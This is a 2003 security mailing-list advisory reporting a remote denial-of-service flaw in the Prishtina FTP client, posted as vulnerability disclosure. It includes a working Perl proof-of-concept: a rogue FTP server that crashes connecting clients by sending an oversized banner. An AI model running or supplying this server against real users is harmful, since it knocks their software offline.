Prishtina FTP v.1.*: remote DoS

• Previous message: D4rkGr3y: "EServ/2.99: problems"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 21 May 2003 20:58:51 -0700
To: bugtraq@security.nnov.ru, bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----

###############################################################*
# Damage Hacking Group security advisory
# www.dhgroup.org
###############################################################*
#Product: Prishtina FTP v.1.*
#Authors: G.Syla [www.prishtina-soft.com]
#Vulnerability: remote DoS
###############################################################*

#Overview#------------------------------------------------------#
Just ftp client..

#Problem#-------------------------------------------------------#
It's possible to crash ftp-client by sending long ftp-banner to
it.

#Exploit#-------------------------------------------------------#
#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
 print "OK";
 print $client "$buf\n";
 close($client);
}

#wow#-----------------------------------------------------------#
%$#@ www.dhgroup.org -=> opened English version! Come on in :)

#eof

Best regards www.dhgroup.org
  D4rkGr3y icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPsxK9W4LIpseSJmPAQELvwQAt9Adn0/OjjP9tvOKL8UbyGRBacPS3Xrf
X0Q5ocG/coH4hH0E9iDtHItmM8XLkhnF66FiJeBBveTSooohS73Gl9T+MNwxdT1+
46V8SAuq0Jsz8oHTNgGJ2ZGx0E8+3rXCfmngJWSJ0SJaXcEg+a04uidLi74YN0yH
RqkMTrGenPI=
=3a5T
-----END PGP SIGNATURE-----

• Previous message: D4rkGr3y: "EServ/2.99: problems"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]